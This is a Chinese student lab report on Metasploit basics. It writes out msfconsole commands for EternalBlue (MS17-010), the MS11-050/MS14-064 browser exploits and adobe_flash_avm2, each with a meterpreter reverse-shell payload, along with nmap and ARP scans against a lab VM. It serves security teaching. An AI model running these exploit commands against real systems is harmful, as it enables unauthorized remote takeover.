实践使用漏洞和辅助模块

任务一:MS17-010安全漏洞

任务二:(1)MS11-050(失败)(2)MS14-064(唯一)

任务三:abode_flash_avm2

辅助模块:(1)ARP扫描模块(唯一)(2)auxiliary/scanner/smb/smb_ms17_010 (扫描靶机是否会被此漏洞攻击)(3)nmap扫描靶机开放端口(唯一)

实践要求与问题回答

1. 实践内容(3.5分)

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,如ms08_067; (1分)

1.2 一个针对浏览器的攻击,如ms11_050;(1分)

1.3 一个针对客户端的攻击,如Adobe;(1分)

1.4 成功应用任何一个辅助模块。(0.5分)

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分

问题回答

用自己的话解释什么是 exploit , payload , encode.

exploit: 设相当于利用漏洞打开的通道,将做好的木马病毒等顺利传输到靶机。

payload: 简单来说就是病毒代码包装成一个可执行的文件(任意指定类型),然后通过通道传输为获取靶机权限做准备。

encode: 针对payload进行编码,改变payload代码特征(例如不出现“0x00”的特殊机器码等),但是不改变payload为我们所用的特征,能对payload进行加工。

实践过程

本次实践所用的辅助功能及漏洞:nmap扫描,auxiliary辅助模块,MS17-010安全漏洞,MS11-050/MS14-064,abode_flash_avm2

一、Windows服务渗透攻击——MS17-010安全漏洞

(1)打开MSF输入nmap -O -Pn 192.168.239.129

(2)利用auxiliary辅助模块进行扫描:

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.239.129
msf auxiliary(scanner/smb/smb_ms17_010) > run

(3)根据要求设置并攻击:

输入back退回,然后依次输入:

 use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.239.131
set RHOST 192.168.239.129
exploit

二、浏览器渗透攻击——MS11-050/MS14-064

(1)

打开MSF,依次输入:

use windows/browser/ms11_050_mshtml_cobjectelement
set payloadwindows/meterpreter/reverse_http
set LHOST 192.168.239.131
set LPORT 5313
exploit



在靶机上打开生成的URL,发现报错,猜测可能是漏洞和IE版本问题

(2)重新选择:

主要步骤和(1)中大致相同,就是修改一下调用的名称。注意:需要添加的指令AllowPowershellprompt---true并将http链接改成tcp链接

生成URL并开启监听服务:

靶机打开IE浏览器,输入网址:

攻击机回连成功,输入sessions -i获取对话:

三、针对Adobe Reader软件的渗透攻击——abode_flash_avm2

(1)生成PDF文件没有成功(上一届学长学姐的经验并不好用)

(2)利用abode_flash_avm2攻击:

(1)输入search abode

(2)根据要求进行配置:

use exploit/windows/browser/abode_flash_avm2
set srvhost 192.168.239.131
set lhost 192.168.239.131
set payloadwindows/meterpreter/reverse_tcp

(3)在靶机里下载adobe_flash_11。

(4)输入exploit:

(5)在靶机里登录生成出来的地址:



(6)获取权限:

四、辅助模块——ARP扫描模块

网络安全协议中曾经讲到过ARP欺骗,于是我便尝试了ARP扫描

(1)seach寻找模块:

(2)根据要求配置:

第一次扫描的是一个网段(设置及结果如下):

第二次扫描靶机:



实践总结及体会

本次试验在我看来为漏洞寻找合适的靶机是一件很费时间的事情,需要足够的耐心,第二就是如何正确利用MSF的辅助功能为攻击做好铺垫,仍然需要大量反复的实践,不然所掌握的东西仅仅知识一点点皮毛而已。同时我发现想要利用一个漏洞进行攻击也不是一件容易的事情,因为一个漏洞不可能对所有情况都适用,所以攻击方不仅仅是要找合适的漏洞,也要为漏洞找合适的机器或程序。矛和盾的较量看来还要持续很久很久。

2018-2019-2 20165313 《网络对抗技术》 Exp5:MSF基础应用的更多相关文章

  1. 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础

    2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...

  2. 20155227《网络对抗》Exp5 MSF基础应用

    20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...

  3. 20155232《网络对抗》Exp5 MSF基础应用

    20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...

  4. 20155302《网络对抗》Exp5 MSF基础应用

    20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...

  5. 20155323刘威良《网络对抗》Exp5 MSF基础应用

    20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...

  6. 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用

    20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验  (首用) 渗透实验三:Adobe ...

  7. 20145215《网络对抗》Exp5 MSF基础应用

    20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...

  8. 20145208 蔡野 《网络对抗》Exp5 MSF基础应用

    20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...

  9. 20145311王亦徐 《网络对抗技术》 MSF基础应用

    20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...

  10. 20145325张梓靖 《网络对抗技术》 MSF基础应用

    20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...

随机推荐

  1. winfrom程序Datagridview列名问题

    之前在做程序的时候,有遇到过这个问题: 无法将类型“string”隐式转换为“System.Windows.Forms.DataGridViewTextBoxColume"解决方法 解决办法 ...

  2. throw与throws

    throws可以单独使用(一直上抛) throw要么和try-catch-finally语句配套使用,要么与throws配套使用 /** * 总结: *    1.throws是方法抛出异常.如: p ...

  3. 用Tensorflow搭建神经网络的一般步骤

    用Tensorflow搭建神经网络的一般步骤如下: ① 导入模块 ② 创建模型变量和占位符 ③ 建立模型 ④ 定义loss函数 ⑤ 定义优化器(optimizer), 使 loss 达到最小 ⑥ 引入 ...

  4. C语言:函数嵌套2^2!+3^2!

    #include <stdio.h> long f1(int p); long f2(int q); int main (){ int i = 0; long s = 0; for(i = ...

  5. mybatis源码解析之Configuration加载(三)

    概述 上一篇我们主要分析了下<environments>标签下面,transactionManager的配置,上问最后还有个遗留问题:就是在设置事物管理器的时候有个autocommit的变 ...

  6. leetcode python 033 旋转数组查找

    ## 假设升序,import random def find(y):    l,m=len(y),0    while l>1:        n=int(l/2)        if y[0] ...

  7. mpeg4文件分析(纯c解析代码)

    参考链接: 1. MPEG4码流的帧率计算 https://blog.csdn.net/littlebee90/article/details/68924690                2. M ...

  8. java this关键字的使用

    this关键字 this关键字只能在方法内部使用,表示对"调用方法的那个对象"的引用.      this的三个用法:      1.调用本类中的其他方法        如果在方法 ...

  9. Delegate & Event

    Long time without coding,貌似对programming都失去了曾有的一点点sense了,今日有空再细瞄一下.net的委托和事件. Delegate 首先,委托用于引用一类具有相 ...

  10. ef 增加或者更新的习惯思维

    首先申明是我的习惯思维,经常这样写: var item=db.tableName.FirstOrDefault(ii=>....); if(item==null) { item=new ...; ...